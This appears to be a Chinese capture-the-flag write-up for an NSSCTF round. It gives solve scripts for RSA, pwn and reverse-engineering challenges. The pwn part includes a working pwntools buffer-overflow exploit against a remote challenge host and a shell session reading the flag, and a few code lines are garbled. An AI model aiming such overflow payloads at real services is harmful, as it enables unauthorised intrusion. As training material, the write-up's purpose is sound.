打着玩玩,比赛很简单。
Crypto
pr
一个RSA题,n1=p*q,n2=q*r,给了两个c和p,r,而且flag经过pad,用单因子无法解出。分别用p,r解完再取crt
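from Crypto.Util.number import *
import random

# Challenge generator for "pr" (operators and quotes restored from the scraped text).
# NOTE(review): the scraped line reads "flagplaintext NSSCTF{...}"; the `flag`
# alias is an assumption, only `plaintext` is used below.
flag = plaintext = 'NSSCTF{****************}'
charset = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

# Pad the flag with random alphanumerics up to exactly 100 characters.
padding_length = 100 - len(plaintext)
for _ in range(padding_length):
    plaintext += random.choice(charset)

public_exponent = 31413537523
message = bytes_to_long(plaintext.encode())
# 100 bytes = 800 bits: larger than any single 512-bit prime, smaller than a
# 1024-bit product, so one prime factor alone does not determine the message.
assert message > (1 << 512)
assert message < (1 << 1024)

prime_p = getPrime(512)
prime_q = getPrime(512)
prime_r = getPrime(512)
# Design flaw under study: both moduli share prime_q, and prime_p / prime_r
# are printed below. Publishing any factor of an RSA modulus removes its
# security; two known factors together cover the 800-bit message.
n1 = prime_p * prime_q
n2 = prime_q * prime_r
ciphertext1 = pow(message, public_exponent, n1)
ciphertext2 = pow(message, public_exponent, n2)
print('c1 =', ciphertext1)
print('c2 =', ciphertext2)
print('p =', prime_p)
print('r =', prime_r)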
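# Values printed by the challenge (assignments restored from the scraped text).
c1 = 36918910341116680090654563538246204134840776220077189276689868322808977412566781872132517635399441578464309667998925236488280867210758507758915311644529399878185776345227817559234605958783077866016808605942558810445187434690812992072238407431218047312484354859724174751718700409405142819140636116559320641695
c2 = 15601788304485903964195122196382181273808496834343051747331984997977255326224514191280515875796224074672957848566506948553165091090701291545031857563686815297483181025074113978465751897596411324331847008870832527695258040104858667684793196948970048750296571273364559767074262996595282324974180754813257013752
p = 12101696894052331138951718202838643670037274599483776996203693662637821825873973767235442427190607145999472731101517998719984942030184683388441121181962123
r = 10199001137987151966640837133782537428248507382360655526592866939552984259171772190788036403425837649697437126360866173688083643144865107648483668545682383
e = 31413537523

# The scraped snippet called `invert` and `crt`, which no import on the page
# provides; the standard-library equivalents below keep the snippet runnable
# on its own (three-argument pow with exponent -1 needs Python 3.8+).

# c1 = m^e mod (p*q) implies c1 = m^e mod p, so the residue m mod p is
# recovered with the exponent e^-1 mod (p-1); likewise for r with c2.
m1 = pow(c1, pow(e, -1, p - 1), p)
m2 = pow(c2, pow(e, -1, r - 1), r)

# Chinese remainder theorem for two coprime moduli: the unique m in [0, p*r)
# with m = m1 (mod p) and m = m2 (mod r). The padded message is 800 bits, so
# it is below p*r and this m is the message itself.
m = m1 + p * (((m2 - m1) * pow(p, -1, r)) % r)

plaintext = m.to_bytes((m.bit_length() + 7) // 8, "big")
print(plaintext)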
#b'NSSCTF{yUanshEnx1ncHun2o23!}FA3JmflIoai8BxgdIGUQumsNc5R0hpo53zICaiWZRfjBj59P36EwC4CSfJOsZ3LIOYnhUmsQ'
break
给了私钥的一部分,用0281切开后发现给的是q,...,猜e=0x10001直接解密即可,提交要换壳。
#部分私钥
a Bc8tSTrvGJm2oYuCzIzYg4nwwKBgQDiYUawe5YrPbFhVOMVB8ZByfMa4LjeSDd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2IN7aQo7kZWulHTQDZMFwgOhn0u6glJiqC8bWzYDFOQSFrY9XQ3vwKMspqm697
xMdMUW0LML6oUE9ZjEiAY/5from base64 import *
for i in a.split():print(b64decode(i).hex())
05cf2d493aef1899b6a18b82cc8cfe620e27c302818100e26146b07b963eacf6c585538c541f190727cc6b82e37920dd
676de3106bf29411d27b2bc5090ab7212504e349350f65e699e69930bddad67527e8e448586686da985cc2b58b911ea7
b9b5666f54094b38339851c69cbe7a2870726710fdaba0cf07ea3a8065adf3fe9d741976348654ff56ed74f420a237c0
5d7245cd1f764502818100bbaa507453b9b653815d1bd79e95277e59228d515965640b878e2ee3821ecec7a2daf71379
9a2199d72bcfe38c97db5f0e27d662d3ca3abc8acce848a5e392b34ed1a6e22b889fc08ca68c7ee5e52da31cafc5af6b
b365aef8845937dcc2304fa9faa23cfd31b6edd2320f3b1d80da9c528f044a5b3bb96e7f14403b6d84c28902818100bb
d4ac9b781fa4674ce57c8762f2d54ea5e23eb9a1c36dd877fbfe701d4b03de199f83b5406a0d2aff6440d6f901fe81b5
4152d51e5d18bb423fd7fbb98f279a92bb429407a002cbe5acafb78b7db5ac64b86294cf6f7497d4ffdfdc667ba3b0ec
b68b80f8d1e4f082fd4fbc64989630e61fd12c6df6b9c1fa694e8c5df2d1e50281803fec91f745c465b184793a535992
dbb20cf6324d83dc4bcf99f1ce4a8f3e12e7fab760208b93b90b6ffbe7848c43fefbb655d74ae0e7229525dfdbc72f07
d8837b690a3b9195ae9474d00d9305c203a19f4bba825262faa0bc6d6cd80c5390485ad8f57437bf028cb29aa6fbaf7b
c4cf9d3145b42cc2faa1413d663122018ff9
#q,dp,dq,crt系数:q^(-1) mod p
02818100e26146b07b963eacf6c585538c541f190727cc6b82e37920dd676de3106bf29411d27b2bc5090ab7212504e349350f65e699e69930bddad67527e8e448586686da985cc2b58b911ea7b9b5666f54094b38339851c69cbe7a2870726710fdaba0cf07ea3a8065adf3fe9d741976348654ff56ed74f420a237c05d7245cd1f7645
02818100bbaa507453b9b653815d1bd79e95277e59228d515965640b878e2ee3821ecec7a2daf713799a2199d72bcfe38c97db5f0e27d662d3ca3abc8acce848a5e392b34ed1a6e22b889fc08ca68c7ee5e52da31cafc5af6bb365aef8845937dcc2304fa9faa23cfd31b6edd2320f3b1d80da9c528f044a5b3bb96e7f14403b6d84c289
02818100bbd4ac9b781fa4674ce57c8762f2d54ea5e23eb9a1c36dd877fbfe701d4b03de199f83b5406a0d2aff6440d6f901fe81b54152d51e5d18bb423fd7fbb98f279a92bb429407a002cbe5acafb78b7db5ac64b86294cf6f7497d4ffdfdc667ba3b0ecb68b80f8d1e4f082fd4fbc64989630e61fd12c6df6b9c1fa694e8c5df2d1e5
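# Last split field of the key fragment (tag 02, length 0x80), kept for reference:
# 0281803fec91f745c465b184793a535992dbb20cf6324d83dc4bcf99f1ce4a8f3e12e7fab760208b93b90b6ffbe7848c43fefbb655d74ae0e7229525dfdbc72f07d8837b690a3b9195ae9474d00d9305c203a19f4bba825262faa0bc6d6cd80c5390485ad8f57437bf028cb29aa6fbaf7bc4cf9d3145b42cc2faa1413d663122018ff9

# First complete INTEGER of the fragment, which the write-up identifies as the prime q.
q = 0x00e26146b07b963eacf6c585538c541f190727cc6b82e37920dd676de3106bf29411d27b2bc5090ab7212504e349350f65e699e69930bddad67527e8e448586686da985cc2b58b911ea7b9b5666f54094b38339851c69cbe7a2870726710fdaba0cf07ea3a8065adf3fe9d741976348654ff56ed74f420a237c05d7245cd1f7645
c = 6081370370545409218106271903400346695565292992689150366474451604281551878507114813906275593034729563149286993189430514737137534129570304832172520820901940874698337733991868650159489601159238582002010625666203730677577976307606665760650563172302688129824842780090723167480409842707790983962415315804311334507726664838464859751689906850572044873633896253285381878416855505301919877714965930289139921111644393144686543207867970807469735534838601255712764863973853116693691206791007433101433703535127367245739289103650669095061417223994665200039533840922696282929063608853551346533188464573323230476645532002621795338655
# The public exponent is not part of the leaked fragment; the write-up guesses the common 0x10001.
e = 0x10001

# The scraped snippet used `invert`/`long_to_bytes` without a visible import;
# the standard-library forms are used instead (pow(e, -1, n) needs Python 3.8+).
# Decrypting modulo q alone yields m mod q, which equals m only because the
# message is shorter than q (unpadded plaintext), per the write-up's result.
m = pow(c, pow(e, -1, q - 1), q)
flag = m.to_bytes((m.bit_length() + 7) // 8, "big")
print(flag)
#b'flag{oi!_you_find___what_i_Wa1t_talK_y0n!!!}'
#NSSCTF{oi!_you_find___what_i_Wa1t_talK_y0n!!!}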
PWN
nc_pwnre
nc后给出汇编和密文,加密很简单,就是个异或,把结果base64解码后提交就进入shell
┌──(kali㉿kali)-[~/ctf/1223]
└─$ nc node7.anna.nssctf.cn 28164
pwn? re?no no no,this is just an easy nc-test.
loc_40116D:
mov eax, [ebp+i]
add eax, 1
mov [ebp+i], eax
loc_401176:
mov ecx, [ebp+Str]
push ecx
call _strlen
add esp, 4
cmp [ebp+i], eax
jge short loc_40119D
mov edx, [ebp+Str]
add edx, [ebp+i]
movsx eax, byte ptr [edx]
xor eax, 10h
mov ecx, [ebp+Str]
add ecx, [ebp+i]
mov [ecx], al
jmp short loc_40116D
maybe the result is talking about xor?
My result:
0x44,0x7c,0x5e,0x44,0x41,0x21,0x42,0x57,0x75,0x21,0x74,0x56,0x44,0x57,0x5d,0x67,0x44,0x46,0x29,0x45,0x5d,0x56,0x29,0x67,0x46,0x22,0x25,0x76,0x74,0x6a,0x52,0x69,0x5d,0x47,0x41,0x78,0x76,0x41,0x2d,0x2d
your answer?
NSSCTF{WELc0M_T0_pWn_w0r1d!}
You got it! Try to find the real flag!!!
ls
attachment
bin
dev
flag
lib
lib32
lib64
libx32
cat flag
NSSCTF{722dac10-45f0-4604-93cb-d196b71d7f30}
ret_text
名字就可以看出来是直接溢出到后门。这里有个判断 v2<0 并且 -v2<0,就用-0x80000000绕过即可(32位补码下对INT_MIN取负会溢出,结果仍是INT_MIN;做符号检查时应单独排除INT_MIN或改用更宽的类型)。
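from pwn import *

# Solve script for the ret_text exercise (quotes and operators restored from
# the scraped text). Local run kept commented out, as in the write-up.
# p = process('./ret_text_v0')
p = remote('node1.anna.nssctf.cn', 28406)
context(arch='i386', log_level='debug')

# First prompt: -2147483648 is INT_MIN for a 32-bit int. Per the write-up the
# program checks both the value and its negation for being negative; negating
# INT_MIN overflows back to INT_MIN, so both checks pass.
p.sendlineafter(b'Easy ret2text!!!Input:\n', b'-2147483648')

# Second prompt: 0x24 filler bytes followed by a 32-bit address, which the
# write-up describes as overflowing into the binary's built-in backdoor.
# The unbounded read behind this prompt is the defect a fix would bound.
p.sendafter(b'OK!!!You are right.\n', b'\x00' * 0x24 + p32(0x8049328))
p.interactive()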
Reverse
debugger
就是动调,把exit(0) nop掉后打个断点,运行到这就看着flag了
a = '''347B46544353534E
2D37376132356434
3331342D61653239
662D346338392D65
3364663634383566
7D643738'''
b''.join([bytes.fromhex(i)[::-1] for i in a.split()])
b'NSSCTF{44d52a77-92ea-413e-98c4-ff5846fd387d}'
CompileMe!
给了个c的代码让编译。有环境估计直接整就行,完成的人不多,说明window上安环境的人真不多。我也没有,不过程序比较简单,一眼RC4,后边是个加减异或的加密,共XXXXXX次,先把这块异出来写成函数。
lines open(Program.cs,rb).readlines()a bdef ccc(val):\n
for line in lines:if line.startswith(b return val):a b val line[18:]print(a)
open(c.py,wb).write(a)
然后在RC4解密原来的程序就是解密程序直接翻译成python后调用ccc
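from ctypes import *
from pwn import p64
# NOTE(review): c.py is produced by the extraction step of this write-up from
# Program.cs; importing it executes that generated text, so read it first and
# run this only in a throwaway environment.
from c import ccc


def decrypt(v, key):
    """Decrypt one pair of 64-bit words and return 16 plaintext bytes.

    Operators were restored from the scraped text; the round structure
    (shifts by 4 and 5, key index from bits 11-12 and bits 0-1 of the running
    sum, delta 0x9E3779B9, 32 rounds) is the XTEA decryption schedule applied
    to 64-bit words.

    Args:
        v: sequence of two ciphertext words.
        key: sequence of four key words, indexed 0..3.

    Returns:
        ccc(v0) and ccc(v1), each masked to 64 bits and emitted big-endian,
        concatenated.
    """
    # c_uint64 makes every `.value` update wrap modulo 2**64.
    v0 = c_uint64(v[0])
    v1 = c_uint64(v[1])
    delta = 0x9E3779B9
    # Decryption starts from the final sum of the encryption loop.
    sum1 = c_uint64((delta) * 32)
    for i in range(32):
        v1.value -= (((v0.value << 4) ^ (v0.value >> 5)) + v0.value) ^ (sum1.value + key[(sum1.value >> 11) & 3])
        sum1.value -= delta
        v0.value -= (((v1.value << 4) ^ (v1.value >> 5)) + v1.value) ^ (sum1.value + key[sum1.value & 3])
    # p64 packs little-endian; reversing gives the big-endian byte order.
    return p64(ccc(v0.value) & 0xffffffffffffffff)[::-1] + p64(ccc(v1.value) & 0xffffffffffffffff)[::-1]


enc = [0xc60b34b2bff9d34a, 0xf50af3aa8fd96c6b, 0x680ed11f0c05c4f1, 0x6e83b0a4aaf7c1a3, 0xd69b3d568695c3c5, 0xa88f4ff50a351da2, 0x5cfa195968e1bb5b, 0xc4168018d92196d9]
key = [0x57656c636f6d6520, 0x746f204e53534354, 0x4620526f756e6423, 0x3136204261736963]

# Decrypt the eight ciphertext words two at a time.
flag = b''
for i in range(0, 8, 2):
    flag += decrypt(enc[i:i + 2], key)
print(flag)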
#NSSCTF{58MtU4iTx4uKu8PVHEYyY9a7tZ0daqVIfJVV9kpMRZ7uvDGYHRuJ58Mz}
v7 - (((v8 4) ^ (v8 5)) v8) ^ (v4 v16[(v4 11) 3]);
v4 - v14;
v8 - (((v7 4) ^ (v7 5)) v7) ^ (v4 v16[v4 3]);